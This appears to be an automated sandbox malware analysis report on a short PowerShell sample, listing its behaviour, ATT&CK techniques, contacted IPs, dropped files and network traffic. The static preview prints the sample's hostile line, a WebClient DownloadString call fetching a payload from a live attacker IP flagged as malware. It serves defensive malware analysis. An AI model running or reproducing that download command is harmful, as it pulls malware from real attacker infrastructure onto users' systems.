Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4578			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5257			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908

Thread sleep time: -17524406870024063s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 00000000.00000002.1740702076.00000222F3850000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWro>
Source: powershell.exe, 00000000.00000002.1742106086.00000222F3BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll88

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
anyrunsample.ps1	0%	Virustotal		Browse
anyrunsample.ps1	0%	ReversingLabs

Source	Detection	Scanner	Label
http://92.255.57.155	0%	Avira URL Cloud	safe
http://crl.microso3	0%	Avira URL Cloud	safe
http://92.255.H	0%	Avira URL Cloud	safe
http://92.255.57.155/1/1.png	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.155/1/1.png	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://92.255.H	powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1737296887.00000222EB7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1737296887.00000222EB7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000000.00000002.1742106086.00000222F3BDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://92.255.57.155	powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	powershell.exe, 00000000.00000002.1742106086.00000222F3C1A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microso3	powershell.exe, 00000000.00000002.1742106086.00000222F3BDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1722951881.00000222DB741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1722951881.00000222DB741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.255.57.155	unknown	Russian Federation		42253	TELSPRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577163
Start date and time:	2024-12-18 08:13:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	anyrunsample.ps1
Detection:	MAL
Classification:	mal52.winPS1@2/5@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .ps1 Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target powershell.exe, PID 6336 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:13:57	API Interceptor	25x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.255.57.155	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	92.255.57.155/1/1.png

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELSPRU	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	92.255.57.75
	ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	92.255.57.75
	fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	mMgFHz9PdG.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	vCZfRWB1kd.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gibbqjar.3fk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvh2smtk.rhv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7352004301480166
Encrypted:	false
SSDEEP:	48:RNs8Qb4LPr3C4U28wjzukvhkvklCyw5mdc5v8g62klCQSogZow85v8g62klCQSou:/0433CxHwOkvhkvCCth8hzgHe8hzgHT
MD5:	0EF7563D2496973098CBBC160C6D00C3
SHA1:	4F8B481D19243B5A8CF3505F2CD8A9F0B3EF8672
SHA-256:	C27F86D9F7284ECA4451812D4BFA2F945B2A5B14219D0163A532EB7FCC018C1E
SHA-512:	419C03A4B5E06D3975B80799AC7083C596686D89818A56C84AA9B33ADF3924218DA772CF9C46E5E6129BBA5BB70A956549A296F1E40EE7C1ABD0D93993EC7289
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....\.f.Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....[e.b.Q..Z..f.Q......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.9...........................%..A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......CW.^.Y.9...........................a6.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.9..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................z..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.9....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5ME66MQ1J5VZ22GGHA1.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7352004301480166
Encrypted:	false
SSDEEP:	48:RNs8Qb4LPr3C4U28wjzukvhkvklCyw5mdc5v8g62klCQSogZow85v8g62klCQSou:/0433CxHwOkvhkvCCth8hzgHe8hzgHT
MD5:	0EF7563D2496973098CBBC160C6D00C3
SHA1:	4F8B481D19243B5A8CF3505F2CD8A9F0B3EF8672
SHA-256:	C27F86D9F7284ECA4451812D4BFA2F945B2A5B14219D0163A532EB7FCC018C1E
SHA-512:	419C03A4B5E06D3975B80799AC7083C596686D89818A56C84AA9B33ADF3924218DA772CF9C46E5E6129BBA5BB70A956549A296F1E40EE7C1ABD0D93993EC7289
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....\.f.Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....[e.b.Q..Z..f.Q......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.9...........................%..A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......CW.^.Y.9...........................a6.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.9..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................z..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.9....Q...........

Static File Info

General

File type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Entropy (8bit):	4.945378586342391
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	anyrunsample.ps1
File size:	76 bytes
MD5:	cd287bd80c045824ffe703e4f11d0ff7
SHA1:	bf36ec53d169c52edb670fb82e9d54050ba7d277
SHA256:	48f64004d6117fe2a7ff0752f7f91853506ceb1dffdc5cbe1d083ad1c1b4b4ef
SHA512:	1b74f5a5a9f400e629012013ac955ace092e145690ecb56efec80c842881f653d0501f9daa1ca22bd609cd3f0053f554594c40150c994dd5ffbd2cb6b920552d
SSDEEP:	3:StmAcLhzAK5Dm3LlLUwUPdCCM:NzD5C7lghfM
TLSH:	C4A0121CD110D59805004686D4B51C56C10042809253D49042A24A508940400A608102
File Content Preview:	...(New-Object Net.WebClient).DownloadString('http://92.255.57.155/1/1.png')

File Icon


Icon Hash:	3270d6baae77db44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 08:13:59.587762117 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:13:59.707243919 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:13:59.707355022 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:13:59.707861900 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:13:59.827686071 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027664900 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027682066 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027697086 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027712107 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027726889 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027745962 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027753115 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.027776957 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.027784109 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.027800083 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.028085947 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.028100967 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.028116941 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.028275013 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.147536993 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.147635937 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.147682905 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.218225956 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.218444109 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.218493938 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.222367048 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.223931074 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.223978043 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.224004030 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.232469082 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.232516050 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.232532978 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.240684986 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.240731001 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.240942955 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.249244928 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.249259949 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.249289036 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.257577896 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.257617950 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.257698059 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.267041922 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.267127991 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.267210007 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.276186943 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.276201963 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.276247025 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.283217907 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.283232927 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.283277988 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.290937901 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.290982008 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.291213036 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.299339056 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.299387932 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.409636021 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.409713030 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.409781933 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.412106991 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.412410975 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.412461996 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.417588949 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.417644978 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.417696953 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.422727108 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.423018932 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.423083067 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.427741051 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.427954912 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.428009987 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.432972908 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.432987928 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.433063030 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.437660933 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.437676907 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.437746048 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.442449093 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.442512035 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.442565918 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.447392941 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.447417974 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.447482109 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.452199936 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.452275991 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.452326059 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.456968069 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.457201958 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.457257986 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.461812019 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.461843014 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.461891890 CET	49730	80	192.168.2.4	92.255.57.155
